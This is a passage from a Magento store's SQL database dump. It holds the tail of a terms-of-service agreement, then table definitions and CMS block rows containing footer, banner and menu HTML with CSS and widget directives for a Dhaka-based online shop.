bismoy Deal and our parent, subsidiaries, affiliates, partners, officers, directors, agents, contractors, licensors, service providers, subcontractors, suppliers, interns and employees, harmless from any claim or demand, including reasonable attorneys’ fees, made by any third-party due to or arising out of your breach of these Terms of Service or the documents they incorporate by reference, or your violation of any law or the rights of a third-party.\r\n\r\n\r\nSECTION 15 - SEVERABILITY\r\nIn the event that any provision of these Terms of Service is determined to be unlawful, void or unenforceable, such provision shall nonetheless be enforceable to the fullest extent permitted by applicable law, and the unenforceable portion shall be deemed to be severed from these Terms of Service, such determination shall not affect the validity and enforceability of any other remaining provisions.\r\n\r\n\r\nSECTION 16 - TERMINATION\r\nThe obligations and liabilities of the parties incurred prior to the termination date shall survive the termination of this agreement for all purposes.\r\n\r\nThese Terms of Service are effective unless and until terminated by either you or us. You may terminate these Terms of Service at any time by notifying us that you no longer wish to use our Services, or when you cease using our site.\r\n\r\nIf in our sole judgment you fail, or we suspect that you have failed, to comply with any term or provision of these Terms of Service, we also may terminate this agreement at any time without notice and you will remain liable for all amounts due up to and including the date of termination; and/or accordingly may deny you access to our Services (or any part thereof).\r\n\r\n\r\nSECTION 17 - ENTIRE AGREEMENT\r\nThe failure of us to exercise or enforce any right or provision of these Terms of Service shall not constitute a waiver of such right or provision.\r\n\r\nThese Terms of Service and any policies or operating rules posted by us on this site or in respect to The Service constitutes the entire agreement and understanding between you and us and govern your use of the Service, superseding any prior or contemporaneous agreements, communications and proposals, whether oral or written, between you and us (including, but not limited to, any prior versions of the Terms of Service).\r\n\r\nAny ambiguities in the interpretation of these Terms of Service shall not be construed against the drafting party.\r\n\r\n\r\nSECTION 18 - GOVERNING LAW\r\nThese Terms of Service and any separate agreements whereby we provide you Services shall be governed by and construed in accordance with the laws of House: 134, Road:12, Block:E, Banani, Dhaka, C, 1213, Bangladesh.\r\n\r\n\r\nSECTION 19 - CHANGES TO TERMS OF SERVICE\r\nYou can review the most current version of the Terms of Service at any time at this page.\r\n\r\nWe reserve the right, at our sole discretion, to update, change or replace any part of these Terms of Service by posting updates and changes to our website. It is your responsibility to check our website periodically for changes. Your continued use of or access to our website or the Service following the posting of any changes to these Terms of Service constitutes acceptance of those changes.\r\n\r\n\r\nSECTION 20 - CONTACT INFORMATION\r\nQuestions about the Terms of Service should be sent to us at sales@bismoy.com', NULL, 'I agree with the Terms and Conditions.', 1, 0, 1);

-- --------------------------------------------------------

--
-- Table structure for table `checkout_agreement_store`
--

CREATE TABLE `checkout_agreement_store` (
  `agreement_id` int(10) UNSIGNED NOT NULL COMMENT 'Agreement ID',
  `store_id` smallint(5) UNSIGNED NOT NULL COMMENT 'Store ID'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Checkout Agreement Store';

--
-- Dumping data for table `checkout_agreement_store`
--

INSERT INTO `checkout_agreement_store` (`agreement_id`, `store_id`) VALUES
(1, 0);

-- --------------------------------------------------------

--
-- Table structure for table `cms_block`
--

CREATE TABLE `cms_block` (
  `block_id` smallint(6) NOT NULL COMMENT 'Entity ID',
  `title` varchar(255) NOT NULL COMMENT 'Block Title',
  `identifier` varchar(255) NOT NULL COMMENT 'Block String Identifier',
  `content` mediumtext DEFAULT NULL COMMENT 'Block Content',
  `creation_time` timestamp NOT NULL DEFAULT current_timestamp() COMMENT 'Block Creation Time',
  `update_time` timestamp NOT NULL DEFAULT current_timestamp() ON UPDATE current_timestamp() COMMENT 'Block Modification Time',
  `is_active` smallint(6) NOT NULL DEFAULT 1 COMMENT 'Is Block Active'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='CMS Block Table';

--
-- Dumping data for table `cms_block`
--

INSERT INTO `cms_block` (`block_id`, `title`, `identifier`, `content`, `creation_time`, `update_time`, `is_active`) VALUES
(1, 'Footer Left', 'footer-left', '<div class=\"footer-left-content\">\r\n	<div class=\"header_footer\">\r\n		<h4 id=\"heading\">Shophive is a premium and firt e-Commerce store of Dhaka</h4>\r\n	</div>\r\n	<div class=\"left-content\">\r\n		<div class=\"Address\">\r\n			<b>Address:</b>\r\n			<div class=\"address_info\">\r\n				<p>Rupayan Taj.</p> \r\n				<p>Suite No:H5, 5th Floor,</p>\r\n				<p>1, 1/1, Naya Polton, Dhaka-1000, Bangladesh.</p>\r\n			</div>\r\n			<p class=\"email\"> <b><em class=\"fa fa-facebook\"></em> Email:</b> info@bismoy.com</p>\r\n			<p class=\"call\"> <b> <em class=\"fa fa-phone\"></em> Call:</b> 01934448222</p>\r\n		</div>\r\n		<div class=\"social_icon\">\r\n			<h3>Follow us on various social media</h3>\r\n			<div class=\"social\">\r\n				<ul>\r\n					<li> <a href=\"https://www.facebook.com/tanmoyyyybasak/\"> <em class=\"fa fa-facebook\"></em> </a> </li>\r\n					<li> <a href=\"https://www.linkedin.com/in/tanmoy-basak-370235136/\"> <em class=\"fa fa-linkedin\"></em> </a> </li>\r\n					<li> <a href=\"https://www.instagram.com/tanmoyyyybasak/\"> <em class=\"fa fa-instagram\"></em> </a> </li>\r\n				</ul>\r\n			</div>\r\n		</div>\r\n	</div>\r\n</div>\r\n\r\n<style type=\"text/css\">\r\n	.footer-left-content {\r\n		color: #675c5c;\r\n	}\r\n	.footer-left-content #heading {\r\n		font-weight: bold;\r\n	    padding: 0 0 5px 0;\r\n	    color: #000;\r\n	    font-size: 20px;\r\n	    text-transform: uppercase;\r\n	    margin-bottom: 10px;\r\n	}\r\n	.Address b em {\r\n	    padding: 5px 8px;\r\n	    border: 1px solid #000;\r\n	    border-radius: 50%;\r\n	    margin-right: 8px;\r\n	}\r\n	.address_info {\r\n	    margin-bottom: 10px;\r\n	}\r\n	.social ul li {\r\n	    display: inline-block;\r\n	    width: 30px;\r\n	    height: 31px;\r\n	    border: 1px solid #000;\r\n	    text-align: center;\r\n	    border-radius: 50%;\r\n	    margin-right: 10px !important;\r\n	}\r\n	.social_icon .social {\r\n	    margin-top: 12px;\r\n	}\r\n	.social ul li a {\r\n	    font-size: 18px;\r\n	    color: #675c5c;\r\n	}\r\n</style>\r\n', '2020-08-02 14:01:22', '2021-06-08 08:40:19', 1),
(2, 'Footer Middle', 'footer-middle', '<div class=\"footer-middle-content\">\r\n<ul>\r\n<li id=\"heading\">INFORMATION</li>\r\n<li><a href=\"Payment Method\">Payment Method</a></li>\r\n<li><a href=\"Shipping Information\">Shipping Information</a></li>\r\n<li><a href=\"Price Policy\">Price Policy</a></li>\r\n<li><a href=\"Money Back Guarantee\">Money Back Guarantee</a></li>\r\n<li><a href=\"Return Policy\">Return Policy</a></li>\r\n</ul>\r\n</div>\r\n\r\n<style type=\"text/css\">\r\n	.footer-middle-content ul a:before {\r\n	    content: \"\\f101\";\r\n	    font: normal normal normal 14px/1 FontAwesome;\r\n	    padding-right: 8px;\r\n	}\r\n	.footer-middle-content ul a {\r\n	    color: #675c5c;\r\n	}\r\n</style>\r\n', '2020-08-02 14:02:11', '2021-06-08 08:48:49', 1),
(3, 'Footer Right', 'footer-right', '<div class=\"footer-right-content ff\">\r\n<ul>\r\n<li id=\"heading\">GET TO KNOW US</li>\r\n<li><a href=\"Help\">Help</a></li>\r\n<li><a href=\"customer/account/\">My Account</a></li>\r\n<li><a href=\"Press\">Press</a></li>\r\n<li><a href=\"Corporate Sales\">Corporate Sales</a></li>\r\n<li><a href=\"contact\">Contact Us</a></li>\r\n<li><a href=\"about-us\">About Us</a></li>\r\n</ul>\r\n</div>\r\n<style type=\"text/css\">\r\n	.footer-right-content ul a:before {\r\n	    content: \"\\f101\";\r\n	    font: normal normal normal 14px/1 FontAwesome;\r\n	    padding-right: 8px;\r\n	}\r\n	.footer-right-content ul a {\r\n	    color: #675c5c;\r\n	}\r\n</style>', '2020-08-02 14:03:26', '2021-06-08 08:52:03', 1),
(4, 'Newsletter', 'newsletter', '<div class=\"newsletter-content\">\r\n	<span class=\"newsletter-text\">Sign up to <strong>NEWSLETTER FREE SHIPPING</strong> For first SHIPPING</span>\r\n	<span class=\"newsletter-from\">{{block class=\"Magento\\Newsletter\\Block\\Subscribe\" name=\"static.newsletter\" template=\"Magento_Newsletter::subscribe.phtml\"}}</span>\r\n</div>', '2020-08-02 14:57:29', '2020-08-02 14:57:29', 1),
(5, 'Second Banner', 'second-banner', '<div class=\"second-banner-content\">\r\n<ul>\r\n<li id=\"second-banner-left\"><img src=\"{{media url=\"wysiwyg/home/banner_4.png\"}}\" alt=\"\" width=\"750\" height=\"240\"></li>\r\n<li id=\"second-banner-right\"><img src=\"{{media url=\"wysiwyg/home/banner_5.png\"}}\" alt=\"\" width=\"750\" height=\"240\"></li>\r\n</ul>\r\n</div>', '2020-08-02 15:23:15', '2020-08-28 06:28:53', 1),
(6, 'First banner', 'first-banner', '<div class=\"first_banner\">\r\n<ul>\r\n<li><a href=\"cream.html\"><img src=\"{{media url=\"wysiwyg/home/banner_1.png\"}}\" alt=\"\" width=\"350\" height=\"260\"></a></li>\r\n<li><a href=\"grocery.html\"><img src=\"{{media url=\"wysiwyg/home/banner_2.png\"}}\" alt=\"\" width=\"350\" height=\"260\"></a></li>\r\n<li><a href=\"cosmetics.html\"><img src=\"{{media url=\"wysiwyg/home/banner_3.png\"}}\" alt=\"\" width=\"350\" height=\"260\"></a></li>\r\n</ul>\r\n</div>', '2020-08-02 15:36:32', '2020-08-28 06:22:26', 1),
(7, 'latest product', 'latest-product', '<div class=\"latest-product-content\">\r\n<div class=\"latest-inner\">\r\n<h4>latest-product</h4>\r\n<hr>\r\n<div class=\"atest-product-list\">\r\n<ul>\r\n<li>{{widget type=\"Magento\\Catalog\\Block\\Product\\Widget\\NewWidget\" display_type=\"all_products\" show_pager=\"8\" products_per_page=\"8\" products_count=\"8\" template=\"product/widget/new/content/new_grid.phtml\" page_var_name=\"pmbfrt\" type_name=\"Catalog New Products List\"}}</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<div id=\"gtx-trans\" style=\"position: absolute; left: 50px; top: 96.2188px;\">\r\n<div class=\"gtx-trans-icon\">&nbsp;</div>\r\n</div>\r\n</div>', '2020-08-02 15:57:22', '2020-08-18 03:27:37', 1),
(8, 'Copyright', 'copyright', '<hr>\r\n<div class=\"copyright-content\">\r\n<p class=\"copyright-text\">Copyright © 2020 by echosystech.com All Rights Reserved</p>\r\n<ul>\r\n<li class=\"copyright-payment\"><img src=\"{{media url=\"wysiwyg/payment.png\"}}\" alt=\"\"></li>\r\n</ul>\r\n</div>', '2020-08-03 01:21:22', '2020-08-18 04:14:07', 1),
(9, 'Grocery', 'grocery', '<div class=\"grocery-content\">\r\n<h4>GROCERY</h4>\r\n<hr>\r\n<div class=\"grocery-content-body\">\r\n<div class=\"grocery-left\"><a href=\"grocery.html\"> <img src=\"{{media url=\'wysiwyg/home/banner_7.png\'}}\" alt=\"\"></a></div>\r\n<div class=\"grocery-right\">{{widget type=\"Magento\\CatalogWidget\\Block\\Product\\ProductsList\" show_pager=\"0\" products_count=\"4\" template=\"Magento_CatalogWidget::product/widget/content/grid.phtml\" conditions_encoded=\"^[`1`:^[`type`:`Magento||CatalogWidget||Model||Rule||Condition||Combine`,`aggregator`:`all`,`value`:`1`,`new_child`:``^],`1--1`:^[`type`:`Magento||CatalogWidget||Model||Rule||Condition||Product`,`attribute`:`category_ids`,`operator`:`==`,`value`:`6`^]^]\"}}</div>\r\n</div>\r\n\r\n</div>\r\n<p>&nbsp;</p>', '2020-08-03 02:41:36', '2020-08-22 09:45:10', 1),
(10, 'Third Banner', 'third-banner', '<p>{{block class=\"Mageplaza\\BannerSlider\\Block\\Widget\" slider_id=\"2\"}}</p>\r\n<p><img src=\"{{media url=\"wysiwyg/home/banner_6.png\"}}\" alt=\"\" width=\"1500\" height=\"350\"></p>', '2020-08-03 07:28:57', '2020-08-28 06:36:54', 1),
(11, 'Cosmetics', 'cosmetics', '<div class=\"cosmetics-content\">\r\n<h4>COSMETICS</h4>\r\n<hr>\r\n<div class=\"grocery-content-body\">\r\n<div class=\"cosmetics-left\"><img src=\"{{media url=\'wysiwyg/home/banner_8.png\'}}\" alt=\"\"></div>\r\n<div class=\"cosmetics-right-product\">\r\n{{widget type=\"Magento\\CatalogWidget\\Block\\Product\\ProductsList\" show_pager=\"0\" products_count=\"4\" template=\"Magento_CatalogWidget::product/widget/content/grid.phtml\" conditions_encoded=\"^[`1`:^[`type`:`Magento||CatalogWidget||Model||Rule||Condition||Combine`,`aggregator`:`all`,`value`:`1`,`new_child`:``^],`1--1`:^[`type`:`Magento||CatalogWidget||Model||Rule||Condition||Product`,`attribute`:`category_ids`,`operator`:`==`,`value`:`46`^]^]\"}}\r\n\r\n</div>\r\n</div>\r\n</div>', '2020-08-03 07:54:44', '2020-08-17 06:29:54', 1),
(12, 'Footer Links Block', 'footer_links_block', '<ul class=\"footer links\">\n    <li class=\"nav item\"><a href=\"{{store url=\"about-us\"}}\">About us</a></li>\n    <li class=\"nav item\"><a href=\"{{store url=\"customer-service\"}}\">Customer Service</a></li>\n</ul>\n', '2020-08-08 01:45:08', '2020-08-08 01:45:08', 1),
(13, 'Contact us info', 'contact-us-info', '<div class=\"contact-info cms-content\">\n   <p class=\"cms-content-important\">We love hearing from you, our Luma customers. Please contact us about anything at all. Your latest passion, unique health experience or request for a specific product. We’ll do everything we can to make your Luma experience unforgettable every time. Reach us however you like</p>\n   <div class=\"block block-contact-info\">\n       <div class=\"block-title\">\n           <strong>Contact Us Info</strong>\n       </div>\n       <div class=\"block-content\">\n           <div class=\"box box-phone\">\n               <strong class=\"box-title\">\n                   <span>Phone</span>\n               </strong>\n               <div class=\"box-content\">\n                   <span class=\"contact-info-number\">1-800-403-8838</span>\n                   <p>Call the Luma Helpline for concerns, product questions, or anything else. We’re here for you 24 hours a day - 365 days a year.</p>\n               </div>\n           </div>\n           <div class=\"box box-design-inquiries\">\n               <strong class=\"box-title\">\n                   <span>Apparel Design Inquiries</span>\n               </strong>\n               <div class=\"box-content\">\n                   <p>Are you an independent clothing designer? Feature your products on the Luma website! Please direct all inquiries via email to: <a href=\"mailto:cs@luma.com\">cs@luma.com</a></p>\n               </div>\n           </div>\n           <div class=\"box box-press-inquiries\">\n               <strong class=\"box-title\">\n                   <span>Press Inquiries</span>\n               </strong>\n               <div class=\"box-content\">\n                   <p>Please direct all media inquiries via email to: <a href=\"mailto:pr@luma.com\">pr@luma.com</a></p>\n               </div>\n           </div>\n       </div>\n   </div>\n</div>\n', '2020-08-08 01:45:08', '2020-08-08 01:45:08', 1),
(14, 'Sale Left Menu Block', 'sale-left-menu-block', '<div class=\"categories-menu\"><strong class=\"title\"><span>Women\'s Deals</span></strong>\n<ul class=\"items\">\n    <li class=\"item\"><a href=\"{{store url=\"\"}}women/tops-women/hoodies-and-sweatshirts-women.html\">Hoodies and Sweatshirts</a></li>\n    <li class=\"item\"><a href=\"{{store url=\"\"}}women/tops-women/jackets-women.html\">Jackets</a></li>\n    <li class=\"item\"><a href=\"{{store url=\"\"}}women/tops-women/tees-women.html\">Tees</a></li>\n    <li class=\"item\"><a href=\"{{store url=\"\"}}women/tops-women/tanks-women.html\">Bras & Tanks</a></li>\n    <li class=\"item\"><a href=\"{{store url=\"\"}}women/bottoms-women/pants-women.html\">Pants</a></li>\n    <li class=\"item\"><a href=\"{{store url=\"\"}}women/bottoms-women/shorts-women.html\">Shorts</a></li>\n</ul>\n\n<strong class=\"title\"><span>Mens\'s Deals</span></strong>\n<ul class=\"items\">\n    <li class=\"item\"><a href=\"{{store url=\"\"}}men/tops-men/hoodies-and-sweatshirts-men.html\">Hoodies and Sweatshirts</a></li>\n    <li class=\"item\"><a href=\"{{store url=\"\"}}men/tops-men/jackets-men.html\">Jackets</a></li>\n    <li class=\"item\"><a href=\"{{store url=\"\"}}men/tops-men/tees-men.html\">Tees</a></li>\n    <li class=\"item\"><a href=\"{{store url=\"\"}}men/bottoms-men/pants-men.html\">Pants</a></li>\n    <li class=\"item\"><a href=\"{{store url=\"\"}}men/bottoms-men/shorts-men.html\">Shorts</a></li>\n</ul>\n\n<strong class=\"title\"><span>Gear Deals</span></strong>\n<ul class=\"items\">\n    <li class=\"item\"><a href=\"{{store url=\"\"}}gear/bags.html\">Bags</a></li>\n    <li class=\"item\"><a href=\"{{store url=\"\"}}gear/fitness-equipment.html\">Fitness Equipment</a></li>\n</ul>\n</div>', '2020-08-08 01:45:08', '2020-08-08 01:45:08', 1),
(15, 'Gear Left Menu Block', 'gear-left-menu-block', '<div class=\"categories-menu\"><strong class=\"title\"><span></span></strong>\n<ul class=\"items\">\n    <li class=\"item\"><a href=\"{{store url=\"\"}}gear/bags.html\">Bags</a></li>\n    <li class=\"item\"><a href=\"{{store url=\"\"}}gear/fitness-equipment.html\">Fitness Equipment</a></li>\n    <li class=\"item\"><a href=\"{{store url=\"\"}}gear/watches.html\">Watches</a></li>\n</ul>\n</div>', '2020-08-08 01:45:08', '2020-08-08 01:45:08', 1),
(16, 'Men Left Menu Block', 'men-left-menu-block', '<div class=\"categories-menu\"><strong class=\"title\"><span>Tops</span></strong>\n<ul class=\"items\">\n    <li class=\"item\"><a href=\"{{store url=\"\"}}men/tops-men/hoodies-and-sweatshirts-men.html\">Hoodies & Sweatshirts</a></li>\n    <li class=\"item\"><a href=\"{{store url=\"\"}}men/tops-men/jackets-men.html\">Jackets</a></li>\n    <li class=\"item\"><a href=\"{{store url=\"\"}}men/tops-men/tees-men.html\">Tees</a></li>\n    <li class=\"item\"><a href=\"{{store url=\"\"}}men/tops-men/tanks-men.html\">Tanks</a></li>\n</ul>\n\n<strong class=\"title\"><span>Bottoms</span></strong>\n<ul class=\"items\">\n    <li class=\"item\"><a href=\"{{store url=\"\"}}men/bottoms-men/pants-men.html\">Pants</a></li>\n    <li class=\"item\"><a href=\"{{store url=\"\"}}men/bottoms-men/shorts-men.html\">Shorts</a></li>\n</ul>\n</div>', '2020-08-08 01:45:08', '2020-08-08 01:45:08', 1),
(17, 'Women Left Menu Block', 'women-left-menu-block', '<div class=\"categories-menu\"><strong class=\"title\"><span>Tops</span></strong>\n<ul class=\"items\">\n    <li class=\"item\"><a href=\"{{store url=\"\"}}women/tops-women/hoodies-and-sweatshirts-women.html\">Hoodies & Sweatshirts</a></li>\n    <li class=\"item\"><a href=\"{{store url=\"\"}}women/tops-women/jackets-women.html\">Jackets</a></li>\n    <li class=\"item\"><a href=\"{{store url=\"\"}}women/tops-women/tees-women.html\">Tees</a></li>\n    <li class=\"item\"><a href=\"{{store url=\"\"}}women/tops-women/tanks-women.html\">Bras & Tanks</a></li>\n</ul>\n\n<strong class=\"title\"><span>Bottoms</span></strong>\n<ul class=\"items\">\n    <li class=\"item\"><a href=\"{{store url=\"\"}}women/bottoms-women/pants-women.html\">Pants</a></li>\n    <li class=\"item\"><a href=\"{{store url=\"\"}}women/bottoms-women/shorts-women.html\">Shorts</a></li>\n</ul>\n</div>', '2020-08-08 01:45:08', '2020-08-08 01:45:08', 1),
(18, 'New Left Menu Block', 'new-left-menu-block', '<div class=\"categories-menu\"><strong class=\"title\"><span>New in women\'s</span></strong>\n<ul class=\"items\">\n    <li class=\"item\"><a href=\"{{store url=\"\"}}women/tops-women/hoodies-and-sweatshirts-women.html\">Hoodies & Sweatshirts</a></li>\n    <li class=\"item\"><a href=\"{{store url=\"\"}}women/tops-women/jackets-women.html\">Jackets</a></li>\n    <li class=\"item\"><a href=\"{{store url=\"\"}}women/tops-women/tees-women.html\">Tees</a></li>\n    <li class=\"item\"><a href=\"{{store url=\"\"}}women/tops-women/tanks-women.html\">Bras & Tanks</a></li>\n    <li class=\"item\"><a href=\"{{store url=\"\"}}women/bottoms-women/pants-women.html\">Pants</a></li>\n    <li class=\"item\"><a href=\"{{store url=\"\"}}women/bottoms-women/shorts-women.html\">Shorts</a></li>\n</ul>\n\n<strong class=\"title\"><span>New in men\'s</span></strong>\n<ul class=\"items\">\n    <li class=\"item\"><a href=\"{{store url=\"\"}}men/tops-men/hoodies-and-sweatshirts-men.html\">Hoodies & Sweatshirts</a></li>\n    <li class=\"item\"><a href=\"{{store url=\"\"}}men/tops-men/jackets-men.html\">Jackets</a></li>\n    <li class=\"item\"><a href=\"{{store url=\"\"}}men/tops-men/tees-men.html\">Tees</a></li>\n    <li class=\"item\"><a href=\"{{store url=\"\"}}men/tops-men/tanks-men.html\">Tanks</a></li>\n    <li class=\"item\"><a href=\"{{store url=\"\"}}men/bottoms-men/pants-men.html\">Pants</a></li>\n    <li class=\"item\"><a href=\"{{store url=\"\"}}men/bottoms-men/shorts-men.html\">Shorts</a></li>\n</ul>\n</div>', '2020-08-08 01:45:08', '2020-08-08 01:45:08', 1),
(19, 'Women Block', 'women-block', '<div class=\"blocks-promo\">\n    <a href=\"{{store url=\"\"}}women.html\" class=\"block-promo womens-main\">\n        <img src=\"{{media url=\"wysiwyg/womens/womens-main.jpg\"}}\" alt=\"\" />\n        <span class=\"content\">\n            <span class=\"info\">New Luma Yoga Collection</span>\n            <strong class=\"title\">Yoga is ancient<br />Clothing shouldn’t be</strong>\n            <span class=\"more button\">Shop New Yoga</span>\n        </span>\n    </a>\n    <div class=\"block-promo-wrapper block-promo-2columns\">\n        <a href=\"{{store url=\"\"}}women/tops-women/tees-women.html\" class=\"block-promo womens-t-shirts\">\n            <span class=\"content\">\n                <strong class=\"title\">You can’t have too many tees</strong>\n                <img src=\"{{media url=\"wysiwyg/womens/womens-t-shirts.png\"}}\" alt=\"\" />\n                <span class=\"info\">4 tees for the price of 3. Right now</span>\n                <span class=\"more icon\">Women’s Tees</span>\n            </span>\n        </a>\n        <a href=\"{{store url=\"\"}}women/bottoms-women/pants-women.html\" class=\"block-promo womens-pants\">\n            <img src=\"{{media url=\"wysiwyg/womens/womens-pants.jpg\"}}\" alt=\"\" />\n            <span class=\"content\">\n                <strong class=\"title\">Hot pants<br />Hot deals</strong>\n                <span class=\"info\"><span>20% OFF</span>Luma pants when you shop today*</span>\n                <span class=\"more icon\">Shop Pants</span>\n            </span>\n        </a>\n    </div>\n    <a href=\"{{store url=\"\"}}collections/erin-recommends.html\" class=\"block-promo womens-erin\">\n        <span class=\"content\">\n            <strong class=\"title\">What would Erin wear?</strong>\n            <span class=\"info\">It’s no secret: see Luma founder Erin Renny’s wardrobe go-to’s</span>\n            <span class=\"more icon\">Shop Erin Recommends</span>\n        </span>\n        <span class=\"image\"><img src=\"{{media url=\"wysiwyg/womens/womens-erin.jpg\"}}\" alt=\"\" /></span>\n    </a>\n    <div class=\"block-promo-wrapper block-promo-3columns\">\n        <a href=\"{{store url=\"\"}}women/bottoms-women/pants-women.html\" class=\"block-promo womens-category-pants\">\n            <span class=\"content\">\n                <strong class=\"title\">Luma pants</strong>\n                <span class=\"info\">Pants for yoga, gym and outdoors</span>\n                <span class=\"more icon\">Shop Pants</span>\n            </span>\n            <span class=\"image\"><img src=\"{{media url=\"wysiwyg/womens/womens-category-pants.jpg\"}}\" alt=\"\" /></span>\n        </a>\n        <a href=\"{{store url=\"\"}}women/bottoms-women/shorts-women.html\" class=\"block-promo womens-category-shorts\">\n            <span class=\"content\">\n                <strong class=\"title\">Luma shorts</strong>\n                <span class=\"info\">Exercise comfort</span>\n                <span class=\"more icon\">Shop Shorts</span>\n            </span>\n            <span class=\"image\"><img src=\"{{media url=\"wysiwyg/womens/womens-category-shorts.jpg\"}}\" alt=\"\" /></span>\n        </a>\n        <a href=\"{{store url=\"\"}}women/tops-women/tanks-women.html\" class=\"block-promo womens-category-tanks\">\n            <span class=\"content\">\n                <strong class=\"title\">Luma Bras<br />Tanks</strong>\n                <span class=\"info\">Stock up for summer!</span>\n                <span class=\"more icon\">Shop Now</span>\n            </span>\n            <span class=\"image\"><img src=\"{{media url=\"wysiwyg/womens/womens-category-tanks.jpg\"}}\" alt=\"\" /></span>\n        </a>\n    </div>\n</div>\n<div class=\"content-heading\">\n    <h2 class=\"title\">Hot Sellers</h2>\n    <p class=\"info\">Favorites from Luma shoppers</p>\n</div>\n{{widget type=\"Magento\\CatalogWidget\\Block\\Product\\ProductsList\" products_per_page=\"4\" products_count=\"4\" template=\"product/widget/content/grid.phtml\" conditions_encoded=\"^[`1`:^[`type`:`Magento||CatalogWidget||Model||Rule||Condition||Combine`,`aggregator`:`all`,`value`:`1`,`new_child`:``^],`1--1`:^[`type`:`Magento||CatalogWidget||Model||Rule||Condition||Product`,`attribute`:`sku`,`operator`:`()`,`value`:`WS12, WT09, WH05, WP12`^]^]\"}}', '2020-08-08 01:45:08', '2020-08-08 01:45:08', 1),
(20, 'Training Block', 'training-block', '<div class=\"blocks-promo\">\n\n    <a href=\"{{store url=\"\"}}training.html\" class=\"block-promo training-main\">\n        <img src=\"{{media url=\"wysiwyg/training/training-main.jpg\"}}\" alt=\"\" />\n        <span class=\"content\">\n            <strong class=\"title\">\n                <span>Motivate</span> yourself.<br />\n                <span>Reach</span> goals.<br />\n                <span>Boost</span> ambition.<br />\n                <span>Max</span> fitness.<br />\n                <span>Upgrade</span> lifestyle.\n            </strong>\n        </span>\n    </a>\n    <a href=\"{{store url=\"\"}}collections/erin-recommends.html\" class=\"block-promo training-erin\">\n        <img src=\"{{media url=\"wysiwyg/training/training-erin.jpg\"}}\" alt=\"\" />\n        <span class=\"content\">\n            <strong class=\"title\">Before creating Luma, pro trainer Erin Renny helped world-class athletes reach peak fitness</strong>\n            <span class=\"info\">Hand-selected by Erin, our training downloads reflect a commitment to yoga, health and wellness.</span>\n        </span>\n    </a>\n    <a href=\"{{store url=\"\"}}training/training-video.html\" class=\"block-promo training-on-demand\">\n        <span class=\"content\">\n            <span class=\"icon download\"><span>Download</span></span>\n            <strong class=\"title\">Training on demand</strong>\n            <span class=\"info\">Luma downloads to inspire and&nbsp;challenge.<br />Your space, your pace</span>\n            <span class=\"more icon\">Videos</span>\n        </span>\n    </a>\n</div>\n<div class=\"content-heading\">\n    <h2 class=\"title\">Top Videos</h2>\n    <p class=\"info\">Stream free with subscription</p>\n</div>\n{{widget type=\"Magento\\CatalogWidget\\Block\\Product\\ProductsList\" products_count=\"4\" template=\"product/widget/content/grid.phtml\" conditions_encoded=\"^[`1`:^[`type`:`Magento||CatalogWidget||Model||Rule||Condition||Combine`,`aggregator`:`all`,`value`:`1`,`new_child`:``^],`1--1`:^[`type`:`Magento||CatalogWidget||Model||Rule||Condition||Product`,`attribute`:`sku`,`operator`:`()`,`value`:`241-MB08, 240-LV05, 240-LV09, 240-LV07`^]^]\"}}', '2020-08-08 01:45:08', '2020-08-08 01:45:08', 1),
(21, 'Men Block', 'men-block', '<div class=\"blocks-promo\">\n    <a href=\"{{store url=\"\"}}men.html\" class=\"block-promo mens-main\">\n        <img src=\"{{media url=\"wysiwyg/mens/mens-main.jpg\"}}\" alt=\"\" />\n        <span class=\"content\">\n            <span class=\"info\">Luma’s Performance Fabric collection</span>\n            <strong class=\"title\">Going the extra mile just got extra comfortable</strong>\n            <span class=\"more button\">Shop Performance</span>\n        </span>\n    </a>\n    <div class=\"block-promo-wrapper block-promo-2columns\">\n        <a href=\"{{store url=\"\"}}men/tops-men/tees-men.html\" class=\"block-promo mens-t-shirts\">\n            <span class=\"content\">\n                <strong class=\"title\">Save up to $24!</strong>\n                <img src=\"{{media url=\"wysiwyg/mens/mens-t-shirts.png\"}}\" alt=\"\" />\n                <span class=\"info\">Buy 3 Luma tees, get 4 instead</span>\n                <span class=\"more icon\">Shop Tees</span>\n            </span>\n        </a>\n        <a href=\"{{store url=\"\"}}men/bottoms-men/pants-men.html\" class=\"block-promo mens-pants\">\n            <img src=\"{{media url=\"wysiwyg/mens/mens-pants.jpg\"}}\" alt=\"\" />\n            <span class=\"content\">\n                <strong class=\"title\">Last chance<br />for pants</strong>\n                <span class=\"info\">Take <span>20% OFF</span>and save bigtime*</span>\n                <span class=\"more icon\">Shop Pants</span>\n            </span>\n        </a>\n    </div>\n    <div class=\"block-promo-wrapper block-promo-3columns\">\n        <a href=\"{{store url=\"\"}}men/bottoms-men/shorts-men.html\" class=\"block-promo mens-category-shorts\">\n            <span class=\"content\">\n                <strong class=\"title\">Luma shorts</strong>\n                <span class=\"info\">Cool it now</span>\n                <span class=\"more icon\">Shop Shorts</span>\n            </span>\n            <span class=\"image\"><img src=\"{{media url=\"wysiwyg/mens/mens-category-shorts.jpg\"}}\" alt=\"\" /></span>\n        </a>\n        <a href=\"{{store url=\"\"}}men/tops-men/tees-men.html\" class=\"block-promo mens-category-tees\">\n            <span class=\"content\">\n                <strong class=\"title\">Luma tees</strong>\n                <span class=\"info\">Grab a tee or two!</span>\n                <span class=\"more icon\">Shop Tees</span>\n            </span>\n            <span class=\"image\"><img src=\"{{media url=\"wysiwyg/mens/mens-category-tees.jpg\"}}\" alt=\"\" /></span>\n        </a>\n        <a href=\"{{store url=\"\"}}men/tops-men/hoodies-and-sweatshirts-men.html\" class=\"block-promo mens-category-hoodies\">\n            <span class=\"content\">\n                <strong class=\"title\">Luma hoodies</strong>\n                <span class=\"info\">Dress for fitness</span>\n                <span class=\"more icon\">Shop Hoodies</span>\n            </span>\n            <span class=\"image\"><img src=\"{{media url=\"wysiwyg/mens/mens-category-hoodies.jpg\"}}\" alt=\"\" /></span>\n        </a>\n    </div>\n</div>\n<div class=\"content-heading\">\n    <h2 class=\"title\">Hot Sellers</h2>\n    <p class=\"info\">Favorites from Luma shoppers</p>\n</div>\n{{widget type=\"Magento\\CatalogWidget\\Block\\Product\\ProductsList\" products_per_page=\"4\" products_count=\"4\" template=\"product/widget/content/grid.phtml\" conditions_encoded=\"^[`1`:^[`type`:`Magento||CatalogWidget||Model||Rule||Condition||Combine`,`aggregator`:`all`,`value`:`1`,`new_child`:``^],`1--1`:^[`type`:`Magento||CatalogWidget||Model||Rule||Condition||Product`,`attribute`:`sku`,`operator`:`()`,`value`:`MT07, MH07, MSH03, 